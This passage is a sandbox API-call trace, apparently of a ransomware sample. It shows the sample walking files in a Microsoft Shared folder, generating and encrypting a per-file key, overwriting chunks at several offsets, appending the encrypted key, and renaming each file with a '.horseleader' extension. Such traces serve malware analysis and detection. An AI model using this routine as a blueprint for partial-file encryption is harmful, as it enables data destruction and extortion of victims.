cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1AR.LEX") returned 70 [0248.562] StrStrIW (lpFirst="MSB1AR.LEX", lpSrch=".horseleader") returned 0x0 [0248.563] lstrcmpW (lpString1="MSB1AR.LEX", lpString2="#Decrypt#.txt") returned 1 [0248.563] lstrcmpW (lpString1="MSB1AR.LEX", lpString2="_uninstalling_.png") returned 1 [0248.563] lstrlenW (lpString=".testttjffg") returned 11 [0248.563] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\TRANSLAT\\MSB1AR.LEX", lpSrch=".testttjffg") returned 0x0 [0248.563] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0248.563] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0248.563] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1AR.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1ar.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0248.564] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1AR.LEX") returned 70 [0248.564] StrStrW (lpFirst="MSB1AR.LEX", lpSrch=".txt") returned 0x0 [0248.564] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2120459) returned 1 [0248.564] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.564] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.589] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.589] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.590] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x100585, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 
[0248.590] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.600] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.600] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.601] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x200b0b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.601] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.606] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.606] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.607] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.607] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0248.607] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, 
lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0248.607] CloseHandle (hObject=0x158) returned 1 [0248.607] GetProcessHeap () returned 0x780000 [0248.607] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.607] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1AR.LEX.horseleader") returned 82 [0248.607] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1AR.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1ar.lex"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1AR.LEX.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1ar.lex.horseleader")) returned 1 [0248.609] GetProcessHeap () returned 0x780000 [0248.609] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.609] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7780a100, ftCreationTime.dwHighDateTime=0x1c4d75f, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7780a100, ftLastWriteTime.dwHighDateTime=0x1c4d75f, nFileSizeHigh=0x0, nFileSizeLow=0x600, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MSB1CACH.LEX", cAlternateFileName="")) returned 1 [0248.609] lstrcmpiW (lpString1="MSB1CACH.LEX", lpString2="Windows") returned -1 [0248.609] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CACH.LEX") returned 72 [0248.609] StrStrIW (lpFirst="MSB1CACH.LEX", lpSrch=".horseleader") returned 0x0 [0248.609] lstrcmpW (lpString1="MSB1CACH.LEX", lpString2="#Decrypt#.txt") returned 1 
[0248.609] lstrcmpW (lpString1="MSB1CACH.LEX", lpString2="_uninstalling_.png") returned 1 [0248.609] lstrlenW (lpString=".testttjffg") returned 11 [0248.609] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CACH.LEX", lpSrch=".testttjffg") returned 0x0 [0248.609] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0248.609] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0248.610] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CACH.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1cach.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0248.611] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CACH.LEX") returned 72 [0248.611] StrStrW (lpFirst="MSB1CACH.LEX", lpSrch=".txt") returned 0x0 [0248.611] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1536) returned 1 [0248.611] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x600, lpOverlapped=0x0) returned 1 [0248.614] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffa00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.614] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x600, lpOverlapped=0x0) returned 1 [0248.614] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, 
lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.614] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0248.614] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0248.615] CloseHandle (hObject=0x158) returned 1 [0248.615] GetProcessHeap () returned 0x780000 [0248.615] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.615] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CACH.LEX.horseleader") returned 84 [0248.615] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CACH.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1cach.lex"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CACH.LEX.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1cach.lex.horseleader")) returned 1 [0248.616] GetProcessHeap () returned 0x780000 [0248.616] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.616] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5c6bc00, ftCreationTime.dwHighDateTime=0x1ca9121, ftLastAccessTime.dwLowDateTime=0x58b4ce70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd5c6bc00, ftLastWriteTime.dwHighDateTime=0x1ca9121, nFileSizeHigh=0x0, nFileSizeLow=0x2b990, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, 
cFileName="MSB1CORE.DLL", cAlternateFileName="")) returned 1 [0248.616] lstrcmpiW (lpString1="MSB1CORE.DLL", lpString2="Windows") returned -1 [0248.616] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CORE.DLL") returned 72 [0248.616] StrStrIW (lpFirst="MSB1CORE.DLL", lpSrch=".horseleader") returned 0x0 [0248.616] lstrcmpW (lpString1="MSB1CORE.DLL", lpString2="#Decrypt#.txt") returned 1 [0248.616] lstrcmpW (lpString1="MSB1CORE.DLL", lpString2="_uninstalling_.png") returned 1 [0248.616] lstrlenW (lpString=".testttjffg") returned 11 [0248.616] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CORE.DLL", lpSrch=".testttjffg") returned 0x0 [0248.617] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0248.617] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0248.617] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CORE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1core.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0248.624] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CORE.DLL") returned 72 [0248.624] StrStrW (lpFirst="MSB1CORE.DLL", lpSrch=".txt") returned 0x0 [0248.624] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=178576) returned 1 [0248.624] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.624] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, 
nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.633] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.633] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.634] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x134c8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.634] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.707] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.708] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.708] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x26990, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.708] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.722] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.723] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, 
nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.723] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.723] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0248.723] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0248.723] CloseHandle (hObject=0x158) returned 1 [0248.723] GetProcessHeap () returned 0x780000 [0248.724] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.724] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CORE.DLL.horseleader") returned 84 [0248.724] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CORE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1core.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CORE.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1core.dll.horseleader")) returned 1 [0248.725] GetProcessHeap () returned 0x780000 [0248.725] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.725] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38c6e400, ftCreationTime.dwHighDateTime=0x1ca6d6a, 
ftLastAccessTime.dwLowDateTime=0x7588f30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x38c6e400, ftLastWriteTime.dwHighDateTime=0x1ca6d6a, nFileSizeHigh=0x0, nFileSizeLow=0x40f70, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MSB1STAR.DLL", cAlternateFileName="")) returned 1 [0248.725] lstrcmpiW (lpString1="MSB1STAR.DLL", lpString2="Windows") returned -1 [0248.725] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1STAR.DLL") returned 72 [0248.725] StrStrIW (lpFirst="MSB1STAR.DLL", lpSrch=".horseleader") returned 0x0 [0248.725] lstrcmpW (lpString1="MSB1STAR.DLL", lpString2="#Decrypt#.txt") returned 1 [0248.725] lstrcmpW (lpString1="MSB1STAR.DLL", lpString2="_uninstalling_.png") returned 1 [0248.725] lstrlenW (lpString=".testttjffg") returned 11 [0248.725] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1STAR.DLL", lpSrch=".testttjffg") returned 0x0 [0248.725] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0248.725] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0248.726] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1STAR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1star.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0248.726] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1STAR.DLL") returned 72 [0248.726] StrStrW (lpFirst="MSB1STAR.DLL", lpSrch=".txt") returned 0x0 [0248.726] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | 
out: lpFileSize=0x32aedd0*=266096) returned 1 [0248.726] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.726] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.731] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.731] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.731] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x1dfb8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.731] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.774] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.774] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.775] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x3bf70, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.775] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) 
returned 1 [0248.777] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.777] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.777] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.777] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0248.777] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0248.778] CloseHandle (hObject=0x158) returned 1 [0248.778] GetProcessHeap () returned 0x780000 [0248.778] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.778] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1STAR.DLL.horseleader") returned 84 [0248.778] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1STAR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1star.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1STAR.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1star.dll.horseleader")) returned 1 [0248.779] GetProcessHeap () returned 0x780000 [0248.779] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) 
returned 1 [0248.779] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4958f00, ftCreationTime.dwHighDateTime=0x1ca9121, ftLastAccessTime.dwLowDateTime=0x58b4ce70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd4958f00, ftLastWriteTime.dwHighDateTime=0x1ca9121, nFileSizeHigh=0x0, nFileSizeLow=0x11390, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MSB1XTOR.DLL", cAlternateFileName="")) returned 1 [0248.779] lstrcmpiW (lpString1="MSB1XTOR.DLL", lpString2="Windows") returned -1 [0248.780] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1XTOR.DLL") returned 72 [0248.780] StrStrIW (lpFirst="MSB1XTOR.DLL", lpSrch=".horseleader") returned 0x0 [0248.780] lstrcmpW (lpString1="MSB1XTOR.DLL", lpString2="#Decrypt#.txt") returned 1 [0248.780] lstrcmpW (lpString1="MSB1XTOR.DLL", lpString2="_uninstalling_.png") returned 1 [0248.780] lstrlenW (lpString=".testttjffg") returned 11 [0248.780] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1XTOR.DLL", lpSrch=".testttjffg") returned 0x0 [0248.780] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0248.780] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0248.780] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1XTOR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1xtor.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0248.845] lstrlenW 
